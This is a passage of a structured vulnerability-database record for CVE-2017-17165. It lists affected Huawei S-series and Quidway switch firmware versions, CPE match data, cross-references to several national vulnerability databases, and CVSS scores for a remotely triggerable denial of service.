            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c02",
         },
         {
            model: "quidway s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc300",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c02",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c01",
         },
         {
            model: "s600-e",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r009c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s600-e",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc300t",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c02",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r009c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c01",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c03",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r009c00",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc300t",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "quidway s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc300",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r009c00",
         },
         {
            model: "quidway s2700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s5300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s5700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s600-e",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700",
            scope: null,
            trust: 0.8,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r003c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r003c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r005c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r003c02",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r005c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r003c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r005c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r005c01",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r005c02",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r009c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r005c03",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r009c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6300 v200r009c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r005c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r009c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s5700 v200r003c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s5300 v200r003c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 v100r006c05",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 v200r005c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 v200r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 v200r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700 v200r005c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700 v200r006c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700 v200r007c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700 v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r003c02",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r003c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2700 v200r009c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "quidway s2700 v200r003c00spc300",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 v200r003c00spc300t",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s2300 v200r009c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r003c00spc300t",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r003c00spc600",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r005c03",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5300 v200r005c05",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r005c01",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r005c02",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r003c00spc600",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s5700 v200r003c00spc316t",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s600-e v200r008c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s600-e v200r009c00",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r005c01",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
         {
            model: "s6700 v200r005c02",
            scope: null,
            trust: 0.6,
            vendor: "huawei",
            version: null,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-37845",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2017-012598",
         },
         {
            db: "NVD",
            id: "CVE-2017-17165",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201712-682",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:quidway_s2700_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:quidway_s2700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:quidway_s5300_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:quidway_s5300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:quidway_s5700_firmware:v200r003c00spc300:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:quidway_s5700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r009c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r003c00spc300t:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2300_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s2300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v200r009c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s2700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s2700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r003c00spc300t:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r003c00spc600:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r003c02:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r005c02:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r005c05:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r009c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r005c01:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r005c03:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5300_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00spc316t:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00spc600:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r003c02:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r005c01:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r005c03:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r009c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r005c02:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s5700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s5700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s600-e_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s600-e_firmware:v200r009c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s600-e:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r009c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6300_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r005c02:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r009c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s6700_firmware:v200r005c01:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s6700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2017-17165",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Huawei internal tester",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201712-682",
         },
      ],
      trust: 0.6,
   },
   cve: "CVE-2017-17165",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "HIGH",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Complete",
                  baseScore: 7.8,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2017-17165",
                  impactScore: null,
                  integrityImpact: "None",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "High",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "CNVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "CNVD-2017-37845",
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  severity: "HIGH",
                  trust: 0.6,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "VHN-108160",
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  severity: "HIGH",
                  trust: 0.1,
                  vectorString: "AV:N/AC:L/AU:N/C:N/I:N/A:C",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 7.5,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 3.9,
                  impactScore: 3.6,
                  integrityImpact: "NONE",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 7.5,
                  baseSeverity: "High",
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2017-17165",
                  impactScore: null,
                  integrityImpact: "None",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2017-17165",
                  trust: 1.8,
                  value: "HIGH",
               },
               {
                  author: "CNVD",
                  id: "CNVD-2017-37845",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201712-682",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "VULHUB",
                  id: "VHN-108160",
                  trust: 0.1,
                  value: "HIGH",
               },
            ],
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-37845",
         },
         {
            db: "VULHUB",
            id: "VHN-108160",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2017-012598",
         },
         {
            db: "NVD",
            id: "CVE-2017-17165",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201712-682",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
